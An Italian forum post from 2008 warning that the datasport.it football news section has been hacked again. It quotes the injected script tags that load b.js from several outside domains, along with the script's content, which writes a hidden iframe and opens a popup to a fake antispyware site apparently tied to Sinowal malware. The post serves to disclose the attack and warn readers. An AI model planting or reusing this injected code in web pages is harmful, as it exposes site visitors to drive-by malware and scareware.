Discussione: [NEWS]Sito datasport.it ulteriormente compromesso
View Single Post
Old 05-06-2008, 09:00   #1
juninho85
Bannato
 
L'Avatar di juninho85
 
Iscritto dal: Mar 2004
Cittā: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28808
[NEWS]Sito datasport.it ulteriormente compromesso
Giovedė 5 gugno 2008

Nel momento in cui scrivo il sito Datasport.it,sezione news calcio serie A, č stato ulteriormente violato: presenti redirect ai siti:
Quote:
http://www.encode72.com/b.js
http://www.view89.com/b.js
http://www.exec51.com/b.js
http://www.sslnet72.com/b.js
http://www.sslnet72.com/b.js
http://www.sslnet72.com/b.js
http://www.win496.com/b.js
Tali script se non ho letto male(putroppo a lavoro non ho i mezzi adatti ad approfondire la cosa)reindirizzano a un falso antispyware e,cosa pių pericolosa,a domini in cui č hostato l'MBR Sinowal.

Ho giā provveduto a segnalare la cosa a datasport.it(ore 10:05).
Avira premium con webguard attivo non segnala nulla di anomalo riguardo lo script

Consiglio a chi utilizza Internet Explorer e l'analisi completa del sistema,idem per chi utilizza Firefox SENZA l'estensione NoScript installata e attiva.

Link all'analisi dello script su virustotal.com
Contenuto dello script su datasport.it
Quote:
<script src=http://www.view89.com/b.js></script><script src=http://www.encode72.com/b.js></script><script src=http://www.exec51.com/b.js></script><script src=http://www.sslnet72.com/b.js></script><script src=http://www.sslnet72.com/b.js></script><script src=http://www.sslnet72.com/b.js></script><script src=http://www.win496.com/b.js></script></a></span></div>
Contentuto dello script in oggetto:
Quote:
window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("bannerupdate=");
if (start != -1)
{}else{
var expires = new Date();
expires.setTime(expires.getTime()+24*1*60*60*1000);
document.cookie = "bannerupdate=update;expires=" + expires.toGMTString();
try{
document.write("<iframe src=http://exec51.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
window.open("http://www.advancedxpdefender.com/sysscan/f3dd61256dd53c3ff34e20b256b505fa/1/",'defender',"toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,width=1024,height=600,top=10,left=10");
}
catch(e)
{
};
}
Il tutto dopo quanto era successo Lunedė 2 giugno come potete leggere qui ...anche questo problema segnalato in quella stessa data senza aver ottenuto uno straccio di risposta ma cosa ben pių grave senza che chi si occupa del portale non abbia provveduto a correre ai ripari nč per ripulire il codice delle varie sezioni del portale nč per eliminare eventuali falle nei software utilizzati
Seguiranno aggiornamenti
Ultima modifica di juninho85 : 05-06-2008 alle 10:32.
juninho85 č offline   Rispondi citando il messaggio o parte di esso